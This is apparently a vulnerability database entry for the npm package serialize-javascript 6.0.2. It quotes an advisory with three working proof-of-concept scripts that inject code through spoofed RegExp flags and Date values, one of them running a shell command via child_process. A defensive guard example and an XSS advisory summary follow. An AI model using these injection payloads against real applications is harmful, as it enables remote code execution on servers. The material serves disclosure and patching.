Package details: pkg:npm/serialize-javascript@6.0.2
purl: pkg:npm/serialize-javascript@6.0.2
Next non-vulnerable version: 7.0.3
Latest non-vulnerable version: 7.0.5
Risk: 4.0
Vulnerabilities affecting this package (1)
Vulnerability: VCID-4zkq-sw4a-e7c3
Aliases: GHSA-5c6j-r48x-rmvq
Summary:
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()

### Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660. While `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.

If an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.

```javascript
const serialize = require('serialize-javascript');

// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', { get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"' });
fakeRegex.toJSON = function() { return '@placeholder'; };

const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}

let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
```

### PoC 2: Code Injection via Date.toISOString()

```javascript
const serialize = require('serialize-javascript');

// Create an object that passes instanceof Date with a spoofed toISOString()
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };

const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}

let obj;
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
```

### PoC 3: Remote Code Execution

```javascript
const serialize = require('serialize-javascript');

const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', { get: () => '"+require("child_process").execSync("id").toString()+"' });
rceRegex.toJSON = function() { return '@rce'; };

const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command
```

### Patches

The fix has been published in version 7.0.3: https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3
Fixed by: 7.0.3
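The defensive counterpart to the advisory above, as an added example that is neither serialize-javascript's code nor its published patch: before a RegExp or Date value is spliced into generated source, its `flags` and `toISOString()` output are checked against the strict grammar a genuine object can produce, and both are emitted through `JSON.stringify` so a stray quote can never terminate the string literal. The function names (`safeRegExpLiteral`, `safeDateLiteral`, `serializeGuarded`, `guardRejectsSpoofed`) and the sample inputs are this example's own.

```javascript
// Added example (not serialize-javascript's own code or patch): validate the two
// values the advisory names, RegExp.flags and Date.prototype.toISOString(), before
// they are spliced into generated source, and quote them so they stay string literals.
const FLAGS_RE = /^[dgimsuvy]*$/;  // the only letters a genuine .flags getter can return
const ISO_RE = /^[+-]?\d{4,6}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}Z$/;  // genuine toISOString()

function safeRegExpLiteral(value) {
  // Read each accessor once; on a spoofed object these getters return attacker text.
  const source = String(value.source);
  const flags = String(value.flags);
  if (!FLAGS_RE.test(flags)) {
    throw new TypeError('refusing RegExp: flags is not a flag string: ' + JSON.stringify(flags));
  }
  // JSON.stringify escapes quotes and backslashes, so neither operand can close the literal.
  return `new RegExp(${JSON.stringify(source)}, ${JSON.stringify(flags)})`;
}

function safeDateLiteral(value) {
  const iso = String(value.toISOString());
  if (!ISO_RE.test(iso)) {
    throw new TypeError('refusing Date: toISOString() is not an ISO timestamp: ' + JSON.stringify(iso));
  }
  return `new Date(${JSON.stringify(iso)})`;
}

// Minimal one-level serializer that mirrors the output shape shown in the PoCs above.
function serializeGuarded(obj) {
  const parts = Object.entries(obj).map(([k, v]) => {
    let lit;
    if (v instanceof RegExp) lit = safeRegExpLiteral(v);
    else if (v instanceof Date) lit = safeDateLiteral(v);
    else lit = JSON.stringify(v);
    return `${JSON.stringify(k)}:${lit}`;
  });
  return `{${parts.join(',')}}`;
}

// Constructed inputs: genuine values, plus a spoofed RegExp built the way the advisory
// describes (with a harmless flags value; only the guard's verdict matters here).
const genuine = { re: /a"b/gi, d: new Date(Date.UTC(2024, 0, 1)) };
const spoofed = Object.create(RegExp.prototype);
Object.defineProperty(spoofed, 'source', { get: () => 'x' });
Object.defineProperty(spoofed, 'flags', { get: () => '"+(1)+"' });

function guardRejectsSpoofed() {
  try { serializeGuarded({ re: spoofed }); return false; }
  catch (e) { return e instanceof TypeError; }
}
```

The allowlist is the primary control; the quoting is defence in depth, so that even a value that slipped past a later-widened allowlist would be a string, not code.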
Affected by 0 other vulnerabilities.
Vulnerabilities fixed by this package (1)
Vulnerability: VCID-h8nr-tcb7-93em
Aliases: CVE-2024-11831, GHSA-76p7-773f-r4q5
Summary: Cross-site Scripting (XSS) in serialize-javascript
A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.

| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
| --- | --- | --- | --- | --- | --- |
| 2026-04-19T00:06:22.032636+00:00 | GHSA Importer | Fixing | VCID-h8nr-tcb7-93em | https://github.com/advisories/GHSA-76p7-773f-r4q5 | 38.4.0 |
| 2026-04-18T04:27:49.247785+00:00 | GithubOSV Importer | Fixing | VCID-h8nr-tcb7-93em | https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json | 38.4.0 |
| 2026-04-17T00:27:45.616985+00:00 | GitLab Importer | Affected by | VCID-4zkq-sw4a-e7c3 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/GHSA-5c6j-r48x-rmvq.yml | 38.4.0 |
| 2026-04-16T23:20:19.965357+00:00 | GitLab Importer | Fixing | VCID-h8nr-tcb7-93em | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/CVE-2024-11831.yml | 38.4.0 |
| 2026-04-12T01:52:26.767373+00:00 | GitLab Importer | Affected by | VCID-4zkq-sw4a-e7c3 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/GHSA-5c6j-r48x-rmvq.yml | 38.3.0 |
| 2026-04-12T00:39:14.860723+00:00 | GitLab Importer | Fixing | VCID-h8nr-tcb7-93em | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/CVE-2024-11831.yml | 38.3.0 |
| 2026-04-07T04:56:58.394927+00:00 | GHSA Importer | Fixing | VCID-h8nr-tcb7-93em | https://github.com/advisories/GHSA-76p7-773f-r4q5 | 38.1.0 |
| 2026-04-03T02:00:46.093456+00:00 | GitLab Importer | Affected by | VCID-4zkq-sw4a-e7c3 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/GHSA-5c6j-r48x-rmvq.yml | 38.1.0 |
| 2026-04-03T00:47:15.156003+00:00 | GitLab Importer | Fixing | VCID-h8nr-tcb7-93em | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/CVE-2024-11831.yml | 38.1.0 |
| 2026-04-02T12:40:47.742129+00:00 | GitLab Importer | Fixing | VCID-h8nr-tcb7-93em | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/serialize-javascript/CVE-2024-11831.yml | 38.0.0 |
| 2026-04-01T12:55:46.075487+00:00 | GithubOSV Importer | Fixing | VCID-h8nr-tcb7-93em | https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json | 38.0.0 |